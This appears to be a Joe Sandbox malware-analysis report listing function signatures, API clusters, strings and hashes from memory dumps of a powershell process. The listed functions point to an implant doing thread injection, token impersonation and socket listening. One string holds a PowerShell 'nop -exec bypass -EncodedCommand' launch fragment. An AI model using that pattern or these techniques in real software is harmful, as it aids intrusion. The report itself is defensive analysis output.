                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                                                                                        • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                                                                        • API String ID: 723279517-1754256099
                                                                                        • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                                                                        • Instruction ID: 09aa017eacb9896f8de8e8f20e9de99102cd62f897e9ef2dae28b901e03c5135
                                                                                        • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                                                                        • Instruction Fuzzy Hash: 2861BE79715B51C2EB10DF29E8406DEA3A1F3A7B80F480016EE5943B9ADF7DC60ACB41
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                                        • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                                                                                        • API String ID: 3442832105-3652497171
                                                                                        • Opcode ID: 29d3f29f5f6492b1378f20e23f058006214b917aee44ffbdb384cf7444ec99de
                                                                                        • Instruction ID: bd3c681463870caae9337c108138674d2ab836c16d40d6bb8a802cbc3a302b2f
                                                                                        • Opcode Fuzzy Hash: 29d3f29f5f6492b1378f20e23f058006214b917aee44ffbdb384cf7444ec99de
                                                                                        • Instruction Fuzzy Hash: AF42E776715E85D6FA56CB2CD0013E8A3A0FFA5759F185501DF8827B61EF38D2AAC301
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                                                                                        • String ID:
                                                                                        • API String ID: 3044875250-0
                                                                                        • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                                                                        • Instruction ID: 5851f3c39ca29431b2342a5aad1c5b4d6b7a19706b5d994c0090bd0100be03dd
                                                                                        • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                                                                        • Instruction Fuzzy Hash: 11718C3A316B40C2E760CF29E44439E73A1F76BB84F194125EA5947B99DF3DC859CB02
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                                                                                        • String ID: %s\*
                                                                                        • API String ID: 2620626937-766152087
                                                                                        • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                                                                        • Instruction ID: 0e850814b4745a7c7d531c147960de21444ab5bfb33c2c8cfa17b750d4a87af0
                                                                                        • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                                                                        • Instruction Fuzzy Hash: 4531233D31658085EA65DB6B29103E97B9273ABFD0F8C40509EA5077DACA3DC41BC315
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressCloseCreateHandleModuleNextOpenProcSleepSnapshotThreadThread32Toolhelp32freemalloc
                                                                                        • String ID: NtQueueApcThread$ntdll
                                                                                        • API String ID: 2813406631-1374908105
                                                                                        • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                                                                        • Instruction ID: 28cdd4c789cb70f988b9d1818039d883a4c21a2a68f8d282fdb775e129af738a
                                                                                        • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                                                                        • Instruction Fuzzy Hash: 59418B3A702B01D9EB20CB6AE8403DD73A4F76AB88F584125DE4C57B89EF79C54AC741
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                                                                                        • String ID: VUUU
                                                                                        • API String ID: 632458648-2040033107
                                                                                        • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                                                                        • Instruction ID: 6038145589f8a931a5870d692c15c08e93ec841261f55108df10d6e1a9b1a393
                                                                                        • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                                                                        • Instruction Fuzzy Hash: E0A1A13D702690C6EB14EB6ED8513ED2261BBAB7C4F9840259949977D6DE3EC50EC302
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: bindclosesockethtonsioctlsocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1767165869-0
                                                                                        • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                                                                        • Instruction ID: 6fae8153655a42f69e8782da164f6602590ee05a69ab4a99ff662ad8edd5a8a3
                                                                                        • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                                                                        • Instruction Fuzzy Hash: C921DE3D312A50C2E724CF0AA41029DA7B0F79BFA4F594624DE6A03790DB7DC44E8702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                                                                        • String ID:
                                                                                        • API String ID: 3910169428-0
                                                                                        • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                                                                        • Instruction ID: 6151574787ef5595f22836ddc306161b955070e53afaab72e0a030d4a8e1225e
                                                                                        • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                                                                        • Instruction Fuzzy Hash: 5221AC3D322A40C2E724DF29E8143D96760F79BBA8F5942299E29433D0EE3DC94EC701
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                                                                                        • String ID: %s\%s
                                                                                        • API String ID: 3621627092-4073750446
                                                                                        • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                                                                        • Instruction ID: df09e2ddfc3d5e9706f13912dd2be2b9d48b229f4850289bfba5ffb9c2c49c2f
                                                                                        • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                                                                        • Instruction Fuzzy Hash: 3B415A38312B44D1FB10EB6AF9547DA23A0E7A7B81F5C2029A95957796DE3CC14EC702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountSleepTick$closesocket
                                                                                        • String ID:
                                                                                        • API String ID: 2363407838-0
                                                                                        • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                                                                        • Instruction ID: dc29426615f8004fba6fabc9e807047761b13d5bef60ffc230e201348174a8e2
                                                                                        • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                                                                        • Instruction Fuzzy Hash: 4F219839706684C1E610EB2AE5441DD6360B7A7BE0F980721ADB9477D6DE3CC50D8742
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: bindclosesockethtonslistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 564772725-0
                                                                                        • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                                                                        • Instruction ID: 0e6fa7023b1d3565c3622995ad1f21cea00e0f4c0544c929ee7b2d05b948537e
                                                                                        • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                                                                        • Instruction Fuzzy Hash: 8711023E315654C2E620DF1AE41429EB360F7A7BA0F0C0222EEA9177D4DF3DC00A8706
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                        • String ID: %s
                                                                                        • API String ID: 4244140340-620797490
                                                                                        • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                                                                        • Instruction ID: fef275e88e7bfe46f48d697a2dc2769987f520db7c1584893fdae497269ea533
                                                                                        • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                                                                        • Instruction Fuzzy Hash: F2216D76B01B00DAE710DB65D4447EC33B5B766B88F4844158E4D97A89EF78C519C381
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread$CurrentProcessRemote
                                                                                        • String ID:
                                                                                        • API String ID: 3122335635-0
                                                                                        • Opcode ID: e1580dfa70b3980f766e965672b95bf8708a4f973e05a7db7a48af4142a1e277
                                                                                        • Instruction ID: 08727bec363425af3b1db11bc9eb7fad2dbdfd05edce9dbe5c9b0399614f2df0
                                                                                        • Opcode Fuzzy Hash: e1580dfa70b3980f766e965672b95bf8708a4f973e05a7db7a48af4142a1e277
                                                                                        • Instruction Fuzzy Hash: 9541413A316780D6E760CF09E44079A73A4F76BBC0F180115EE8893B99CB3EC45ACB01
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentProcessView$FileSection
                                                                                        • String ID:
                                                                                        • API String ID: 2388031229-0
                                                                                        • Opcode ID: 118eb2577b6059a491439a17f4c90e5e0be91d91b4f98844fba68de29d8fe3b0
                                                                                        • Instruction ID: 8a21af2221d1a9e7e8815488ea05132e89b063582c224d6f717b5f29bb387445
                                                                                        • Opcode Fuzzy Hash: 118eb2577b6059a491439a17f4c90e5e0be91d91b4f98844fba68de29d8fe3b0
                                                                                        • Instruction Fuzzy Hash: 6041603A61AB80C6E760CF45F54479AB7A0F397795F180115EA8903B68CB7DC54ACB01
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Virtual$Alloc$AllocateCurrentMemoryProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3902775219-0
                                                                                        • Opcode ID: aae31d7e320f49b2b7b8d2523f04f5552282cf255c9fc24f679e558ee007d563
                                                                                        • Instruction ID: 48f64830bdc8c6f414000ae256e3b15c7ab14b40af9c887061cfb9bb0975e5cc
                                                                                        • Opcode Fuzzy Hash: aae31d7e320f49b2b7b8d2523f04f5552282cf255c9fc24f679e558ee007d563
                                                                                        • Instruction Fuzzy Hash: 6C314E3D316B40C6EA60CF5AB440699B7A4F7B7BC1F4C5511EE4987B94DB3DC80A8B02
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual$CurrentMemoryProcess
                                                                                        • String ID:
                                                                                        • API String ID: 261991438-0
                                                                                        • Opcode ID: aac624e9975941b750356ceb78cd3aa232c6bd2fb96b7d29432793f1a6c54ced
                                                                                        • Instruction ID: 0d5a2627f423246835cf0707f182346fceff1385d24aa27d59f2e38a3919b72f
                                                                                        • Opcode Fuzzy Hash: aac624e9975941b750356ceb78cd3aa232c6bd2fb96b7d29432793f1a6c54ced
                                                                                        • Instruction Fuzzy Hash: 39313E3D316A40C6EA60CF0AB8406D963A4F7A7BD5F0C1021ED4A83B94DF7DD44A8702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ErrorLastSleepioctlsocket
                                                                                        • String ID:
                                                                                        • API String ID: 1121440892-0
                                                                                        • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                                                                        • Instruction ID: 5b03a0b2c8518d638205d7d33f3b94edfeb3d55423c7a6a42d8ad1dab2c9d044
                                                                                        • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                                                                        • Instruction Fuzzy Hash: B7317C3AB02B40C6EB10DBA6E4842DC37B5F39AB90F590226DE6D93795DF35C51AC341
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentProcessQueryVirtual$Memory
                                                                                        • String ID:
                                                                                        • API String ID: 1933613124-0
                                                                                        • Opcode ID: b5efc3e791b05cc6dcc5ce5b56e213e37854e6aa99ab2d2b8288867ca5ef005e
                                                                                        • Instruction ID: 848e2c90c93cb2198ea01976cfc8a1f2e498d2a75e48797f70b39ef57c0989d7
                                                                                        • Opcode Fuzzy Hash: b5efc3e791b05cc6dcc5ce5b56e213e37854e6aa99ab2d2b8288867ca5ef005e
                                                                                        • Instruction Fuzzy Hash: 5E218C3D306A40C6EA60CB09B94039AB3A4F76BBD5F5C1151EE8943BA8DF7DC0498B02
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentProcessUnmapView$FileSection
                                                                                        • String ID:
                                                                                        • API String ID: 3412689278-0
                                                                                        • Opcode ID: b253132bd93df092bbcb7d528c8152120b06c1cec35a35f00afab75cbae75278
                                                                                        • Instruction ID: 3e50e12915f3a443a26c4310207876e71815763784dd316a712a8b1639b02fa4
                                                                                        • Opcode Fuzzy Hash: b253132bd93df092bbcb7d528c8152120b06c1cec35a35f00afab75cbae75278
                                                                                        • Instruction Fuzzy Hash: 3B011A3C703A40D1FAA4DB59B9843E922A1AB6BBC2F1D6025DC1986799CA2DC48DC202
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
